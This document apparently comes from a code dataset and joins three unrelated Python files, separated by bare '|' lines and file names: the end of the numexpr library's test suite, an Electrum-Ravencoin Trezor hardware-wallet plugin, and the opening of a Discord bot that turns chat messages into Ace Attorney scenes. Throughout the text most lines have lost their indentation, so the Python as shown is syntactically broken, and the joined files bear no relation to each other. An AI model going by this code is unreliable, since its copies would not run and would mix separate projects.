def test_neg(self):
a = array([2 ** 31 - 1, 2 ** 31, 2 ** 32, 2 ** 63 - 1], dtype=int64)
res = evaluate('-a')
assert_array_equal(res, [1 - 2 ** 31, -(2 ** 31), -(2 ** 32), 1 - 2 ** 63])
self.assertEqual(res.dtype.name, 'int64')
class test_int32_int64(TestCase):
    if sys.version_info[0] < 3:
        # no long literals in Python 3
def test_small_long(self):
# Small longs should not be downgraded to ints.
res = evaluate('42L')
assert_array_equal(res, 42)
self.assertEqual(res.dtype.name, 'int64')
def test_small_int(self):
# Small ints (32-bit ones) should not be promoted to longs.
res = evaluate('2')
assert_array_equal(res, 2)
self.assertEqual(res.dtype.name, 'int32')
def test_big_int(self):
# Big ints should be promoted to longs.
res = evaluate('2**40')
assert_array_equal(res, 2 ** 40)
self.assertEqual(res.dtype.name, 'int64')
def test_long_constant_promotion(self):
int32array = arange(100, dtype='int32')
itwo = np.int32(2)
ltwo = np.int64(2)
res = int32array * 2
res32 = evaluate('int32array * itwo')
res64 = evaluate('int32array * ltwo')
assert_array_equal(res, res32)
assert_array_equal(res, res64)
self.assertEqual(res32.dtype.name, 'int32')
self.assertEqual(res64.dtype.name, 'int64')
def test_int64_array_promotion(self):
int32array = arange(100, dtype='int32')
int64array = arange(100, dtype='int64')
respy = int32array * int64array
resnx = evaluate('int32array * int64array')
assert_array_equal(respy, resnx)
self.assertEqual(resnx.dtype.name, 'int64')
class test_uint32_int64(TestCase):
def test_small_uint32(self):
# Small uint32 should not be downgraded to ints.
a = np.uint32(42)
res = evaluate('a')
assert_array_equal(res, 42)
self.assertEqual(res.dtype.name, 'int64')
def test_uint32_constant_promotion(self):
int32array = arange(100, dtype='int32')
stwo = np.int32(2)
utwo = np.uint32(2)
res = int32array * utwo
res32 = evaluate('int32array * stwo')
res64 = evaluate('int32array * utwo')
assert_array_equal(res, res32)
assert_array_equal(res, res64)
self.assertEqual(res32.dtype.name, 'int32')
self.assertEqual(res64.dtype.name, 'int64')
def test_int64_array_promotion(self):
uint32array = arange(100, dtype='uint32')
int64array = arange(100, dtype='int64')
respy = uint32array * int64array
resnx = evaluate('uint32array * int64array')
assert_array_equal(respy, resnx)
self.assertEqual(resnx.dtype.name, 'int64')
class test_strings(TestCase):
BLOCK_SIZE1 = 128
BLOCK_SIZE2 = 8
str_list1 = [b'foo', b'bar', b'', b' ']
str_list2 = [b'foo', b'', b'x', b' ']
str_nloops = len(str_list1) * (BLOCK_SIZE1 + BLOCK_SIZE2 + 1)
str_array1 = array(str_list1 * str_nloops)
str_array2 = array(str_list2 * str_nloops)
str_constant = b'doodoo'
def test_null_chars(self):
str_list = [
b'\0\0\0', b'\0\0foo\0', b'\0\0foo\0b', b'\0\0foo\0b\0',
b'foo\0', b'foo\0b', b'foo\0b\0', b'foo\0bar\0baz\0\0']
min_tobytes_version = LooseVersion('1.9.0')
for s in str_list:
r = evaluate('s')
if present_numpy_version >= min_tobytes_version:
self.assertEqual(s, r.tobytes()) # check *all* stored data
else:
# ndarray.tostring() is deprecated as of NumPy 1.19
self.assertEqual(s, r.tostring()) # check *all* stored data
def test_compare_copy(self):
sarr = self.str_array1
expr = 'sarr'
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_compare_array(self):
sarr1 = self.str_array1
sarr2 = self.str_array2
expr = 'sarr1 >= sarr2'
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_compare_variable(self):
sarr = self.str_array1
svar = self.str_constant
expr = 'sarr >= svar'
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_compare_constant(self):
sarr = self.str_array1
expr = 'sarr >= %r' % self.str_constant
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_add_string_array(self):
sarr1 = self.str_array1
sarr2 = self.str_array2
expr = 'sarr1 + sarr2'
self.assert_missing_op('add_sss', expr, locals())
def test_empty_string1(self):
a = np.array([b"", b"pepe"])
b = np.array([b"pepe2", b""])
res = evaluate("(a == b'') & (b == b'pepe2')")
assert_array_equal(res, np.array([True, False]))
res2 = evaluate("(a == b'pepe') & (b == b'')")
assert_array_equal(res2, np.array([False, True]))
def test_empty_string2(self):
a = np.array([b"p", b"pepe"])
b = np.array([b"pepe2", b""])
res = evaluate("(a == b'') & (b == b'pepe2')")
assert_array_equal(res, np.array([False, False]))
res2 = evaluate("(a == b'pepe') & (b == b'')")
assert_array_equal(res, np.array([False, False]))
def test_add_numeric_array(self):
sarr = self.str_array1
narr = arange(len(sarr), dtype='int32')
expr = 'sarr >= narr'
self.assert_missing_op('ge_bsi', expr, locals())
def assert_missing_op(self, op, expr, local_dict):
msg = "expected NotImplementedError regarding '%s'" % op
try:
evaluate(expr, local_dict)
except NotImplementedError as nie:
if "'%s'" % op not in nie.args[0]:
self.fail(msg)
else:
self.fail(msg)
def test_compare_prefix(self):
# Check comparing two strings where one is a prefix of the
# other.
for s1, s2 in [(b'foo', b'foobar'), (b'foo', b'foo\0bar'),
(b'foo\0a', b'foo\0bar')]:
self.assertTrue(evaluate('s1 < s2'))
self.assertTrue(evaluate('s1 <= s2'))
self.assertTrue(evaluate('~(s1 == s2)'))
self.assertTrue(evaluate('~(s1 >= s2)'))
self.assertTrue(evaluate('~(s1 > s2)'))
# Check for NumPy array-style semantics in string equality.
s1, s2 = b'foo', b'foo\0\0'
self.assertTrue(evaluate('s1 == s2'))
# Case for testing selections in fields which are aligned but whose
# data length is not an exact multiple of the length of the record.
# The following test exposes the problem only in 32-bit machines,
# because in 64-bit machines 'c2' is unaligned. However, this should
# check most platforms where, while not unaligned, 'len(datatype) >
# boundary_alignment' is fulfilled.
class test_irregular_stride(TestCase):
def test_select(self):
f0 = arange(10, dtype=int32)
f1 = arange(10, dtype=float64)
irregular = rec.fromarrays([f0, f1])
f0 = irregular['f0']
f1 = irregular['f1']
i0 = evaluate('f0 < 5')
i1 = evaluate('f1 < 5')
assert_array_equal(f0[i0], arange(5, dtype=int32))
assert_array_equal(f1[i1], arange(5, dtype=float64))
# Cases for testing arrays with dimensions that can be zero.
class test_zerodim(TestCase):
def test_zerodim1d(self):
a0 = array([], dtype=int32)
a1 = array([], dtype=float64)
r0 = evaluate('a0 + a1')
r1 = evaluate('a0 * a1')
assert_array_equal(r0, a1)
assert_array_equal(r1, a1)
def test_zerodim3d(self):
a0 = array([], dtype=int32).reshape(0, 2, 4)
a1 = array([], dtype=float64).reshape(0, 2, 4)
r0 = evaluate('a0 + a1')
r1 = evaluate('a0 * a1')
assert_array_equal(r0, a1)
assert_array_equal(r1, a1)
@contextmanager
def _environment(key, value):
old = os.environ.get(key)
os.environ[key] = value
try:
yield
finally:
if old:
os.environ[key] = old
else:
del os.environ[key]
# Test cases for the threading configuration
class test_threading_config(TestCase):
def test_max_threads_unset(self):
# Has to be done in a subprocess as `importlib.reload` doesn't let us
# re-initialize the threadpool
script = '\n'.join([
"import os",
"if 'NUMEXPR_MAX_THREADS' in os.environ: os.environ.pop('NUMEXPR_MAX_THREADS')",
"if 'OMP_NUM_THREADS' in os.environ: os.environ.pop('OMP_NUM_THREADS')",
"import numexpr",
"assert(numexpr.nthreads <= 8)",
"exit(0)"])
subprocess.check_call([sys.executable, '-c', script])
def test_max_threads_set(self):
# Has to be done in a subprocess as `importlib.reload` doesn't let us
# re-initialize the threadpool
script = '\n'.join([
"import os",
"os.environ['NUMEXPR_MAX_THREADS'] = '4'",
"import numexpr",
"assert(numexpr.MAX_THREADS == 4)",
"exit(0)"])
subprocess.check_call([sys.executable, '-c', script])
def test_numexpr_num_threads(self):
with _environment('OMP_NUM_THREADS', '5'):
# NUMEXPR_NUM_THREADS has priority
with _environment('NUMEXPR_NUM_THREADS', '3'):
if 'sparc' in platform.machine():
self.assertEqual(1, numexpr._init_num_threads())
else:
self.assertEqual(3, numexpr._init_num_threads())
def test_omp_num_threads(self):
with _environment('OMP_NUM_THREADS', '5'):
if 'sparc' in platform.machine():
self.assertEqual(1, numexpr._init_num_threads())
else:
self.assertEqual(5, numexpr._init_num_threads())
def test_vml_threads_round_trip(self):
n_threads = 3
if use_vml:
numexpr.utils.set_vml_num_threads(n_threads)
set_threads = numexpr.utils.get_vml_num_threads()
self.assertEqual(n_threads, set_threads)
else:
self.assertIsNone(numexpr.utils.set_vml_num_threads(n_threads))
self.assertIsNone(numexpr.utils.get_vml_num_threads())
# Case test for threads
class test_threading(TestCase):
def test_thread(self):
import threading
class ThreadTest(threading.Thread):
def run(self):
a = arange(3)
assert_array_equal(evaluate('a**3'), array([0, 1, 8]))
test = ThreadTest()
test.start()
test.join()
def test_multithread(self):
import threading
# Running evaluate() from multiple threads shouldn't crash
def work(n):
a = arange(n)
evaluate('a+a')
work(10) # warm compilation cache
nthreads = 30
threads = [threading.Thread(target=work, args=(1e5,))
for i in range(nthreads)]
for t in threads:
t.start()
for t in threads:
t.join()
# The worker function for the subprocess (needs to be here because Windows
# has problems pickling nested functions with the multiprocess module :-/)
def _worker(qout=None):
ra = np.arange(1e3)
rows = evaluate('ra > 0')
#print "Succeeded in evaluation!\n"
if qout is not None:
qout.put("Done")
# Case test for subprocesses (via multiprocessing module)
class test_subprocess(TestCase):
def test_multiprocess(self):
try:
import multiprocessing as mp
except ImportError:
return
# Check for two threads at least
numexpr.set_num_threads(2)
#print "**** Running from main process:"
_worker()
#print "**** Running from subprocess:"
qout = mp.Queue()
ps = mp.Process(target=_worker, args=(qout,))
ps.daemon = True
ps.start()
result = qout.get()
#print result
def print_versions():
"""Print the versions of software that numexpr relies on."""
# from pkg_resources import parse_version
from numexpr.cpuinfo import cpu
import platform
np_version = LooseVersion(np.__version__)
if np_version < minimum_numpy_version:
print('*Warning*: NumPy version is lower than recommended: %s < %s' % (np_version, minimum_numpy_version))
print('-=' * 38)
print('Numexpr version: %s' % numexpr.__version__)
print('NumPy version: %s' % np.__version__)
print('Python version: %s' % sys.version)
(sysname, nodename, release, os_version, machine, processor) = platform.uname()
print('Platform: %s-%s-%s' % (sys.platform, machine, os_version))
try:
        # cpuinfo doesn't seem to work well on OSX, so protect these outputs
        # with a try block
cpu_info = cpu.info[0]
print('CPU vendor: %s' % cpu_info.get('VendorIdentifier', ''))
print('CPU model: %s' % cpu_info.get('ProcessorNameString', ''))
print('CPU clock speed: %s MHz' % cpu_info.get('~MHz',''))
except KeyError:
pass
print('VML available? %s' % use_vml)
if use_vml:
print('VML/MKL version: %s' % numexpr.get_vml_version())
print('Number of threads used by default: %d '
'(out of %d detected cores)' % (numexpr.nthreads, numexpr.ncores))
print('Maximum number of threads: %s' % numexpr.MAX_THREADS)
print('-=' * 38)
def test(verbosity=1):
"""
Run all the tests in the test suite.
"""
print_versions()
# For some reason, NumPy issues all kinds of warnings when using Python3.
# Ignoring them in tests should be ok, as all results are checked out.
# See https://github.com/pydata/numexpr/issues/183 for details.
np.seterr(divide='ignore', invalid='ignore', over='ignore', under='ignore')
return unittest.TextTestRunner(verbosity=verbosity).run(suite())
test.__test__ = False
def suite():
import unittest
import platform as pl
theSuite = unittest.TestSuite()
niter = 1
class TestExpressions(TestCase):
pass
def add_method(func):
def method(self):
return func()
setattr(TestExpressions, func.__name__,
method.__get__(None, TestExpressions))
for func in test_expressions():
add_method(func)
for n in range(niter):
theSuite.addTest(unittest.makeSuite(test_numexpr))
if 'sparc' not in platform.machine():
theSuite.addTest(unittest.makeSuite(test_numexpr2))
theSuite.addTest(unittest.makeSuite(test_evaluate))
theSuite.addTest(unittest.makeSuite(TestExpressions))
theSuite.addTest(unittest.makeSuite(test_int32_int64))
theSuite.addTest(unittest.makeSuite(test_uint32_int64))
theSuite.addTest(unittest.makeSuite(test_strings))
theSuite.addTest(
unittest.makeSuite(test_irregular_stride))
theSuite.addTest(unittest.makeSuite(test_zerodim))
theSuite.addTest(unittest.makeSuite(test_threading_config))
# multiprocessing module is not supported on Hurd/kFreeBSD
if (pl.system().lower() not in ('gnu', 'gnu/kfreebsd')):
theSuite.addTest(unittest.makeSuite(test_subprocess))
    # This test needs to come after test_subprocess because, if not, the
    # test suite locks up immediately before test_subprocess. This only
    # happens on Windows, so I suspect a subtle bad interaction between
    # threads and subprocess :-/
theSuite.addTest(unittest.makeSuite(test_threading))
return theSuite
if __name__ == '__main__':
print_versions()
unittest.main(defaultTest='suite')
# suite = suite()
# unittest.TextTestRunner(verbosity=2).run(suite)
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.ravencoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 6, 0)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 13)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
try:
call_bridge("enumerate")
except Exception:
devices = trezorlib.transport.enumerate_devices()
else:
devices = BridgeTransport.enumerate()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Ravencoin Testnet" if constants.net.TESTNET else "Ravencoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
                # prioritise hiding outputs on the 'change' branch from the user
                # because no more than one change address is allowed
                # note: ^ this restriction can be removed once we require firmware
                # that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
            # probably a segwit input, so we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
main.py
|
import discord
import os
import random
import requests
import sys
import threading
import time
import yaml
sys.path.append("./objection_engine")
from deletion import Deletion
from discord.ext import commands, tasks
from message import Message
from objection_engine.beans.comment import Comment
from objection_engine.renderer import render_comment_list
from render import Render, State
from typing import List
# Global Variables:
renderQueue = []
deletionQueue = []
intents = discord.Intents.default()
intents.members = True
def loadConfig():
try:
with open("config.yaml") as file:
config = yaml.load(file, Loader=yaml.FullLoader)
global token, prefix, deletionDelay
token = config["token"].strip()
if not token:
raise Exception("The 'token' field is missing in the config file (config.yaml)!")
prefix = config["prefix"].strip()
if not prefix:
raise Exception("The 'prefix' field is missing in the config file (config.yaml)!")
deletionDelay = config["deletionDelay"].strip()
if not deletionDelay:
raise Exception("The 'deletionDelay' field is missing in the config file (config.yaml)!")
return True
except KeyError as keyErrorException:
print(f"The mapping key {keyErrorException} is missing in the config file (config.yaml)!")
except Exception as exception:
print(exception)
return False
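# For reference, loadConfig() above expects a config.yaml shaped roughly like the
# sketch below. The keys are the ones looked up in the function; the values are
# hypothetical placeholders, not shipped defaults.
#
#   token: "YOUR_DISCORD_BOT_TOKEN"
#   prefix: "!"
#   deletionDelay: "30"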
if not loadConfig():
exit()
courtBot = commands.AutoShardedBot(command_prefix=prefix, intents=intents)
# Default 'help' command is removed, we will make our own
courtBot.remove_command("help")
currentActivityText = f"{prefix}help"
async def changeActivity(newActivityText):
try:
global currentActivityText
if currentActivityText == newActivityText:
return
else:
newActivity = discord.Game(newActivityText)
await courtBot.change_presence(activity=newActivity)
currentActivityText = newActivityText
print(f"Activity was changed to {currentActivityText}")
except Exception as exception:
print(f"Error: {exception}")
def addToDeletionQueue(message: discord.Message):
    # Only if the deletion delay is greater than 0, add it to the deletionQueue.
if int(deletionDelay) > 0:
newDeletion = Deletion(message, int(deletionDelay))
deletionQueue.append(newDeletion)
@courtBot.event
async def on_message(message):
    if message.author == courtBot.user or message.author.bot:
return
if message.channel.type is discord.ChannelType.private:
embedResponse = discord.Embed(description="I won't process any messages via PM.\nIf you have any problems, please go to [the support server](https://discord.gg/pcS4MPbRDU).", color=0xff0000)
await message.channel.send(embed=embedResponse)
return
await courtBot.process_commands(message)
@courtBot.command()
async def help(context):
dummyAmount = random.randint(2, 150)
    helpEmbed = discord.Embed(description="Discord bot that turns message chains into ace attorney scenes.\nIf you have any problems, please go to [the support server](https://discord.gg/pcS4MPbRDU).", color=0x3366CC)
    # discord.Embed has no 'footer' keyword argument; the footer must be set explicitly
    helpEmbed.set_footer(text="Do not include these symbols (\"<\" and \">\") when using this command")
    helpEmbed.set_author(name=courtBot.user.name, icon_url=courtBot.user.avatar_url)
helpEmbed.add_field(name="How to use?", value=f"`{prefix}render <number_of_messages>`", inline=False)
helpEmbed.add_field(name="Example", value=f"Turn the last {dummyAmount} messages into an ace attorney scene: `{prefix}render {dummyAmount}`", inline=False)
helpEmbed.add_field(name="Starting message", value="By default the bot will load the specified number of messages from the last message (before using the command) going backwards, if you want the message count to start from another message, reply to it when using the command.", inline=False)
helpMessage = await context.send(embed=helpEmbed)
addToDeletionQueue(helpMessage)
# This command is only for the bot owner, it will ignore everybody else
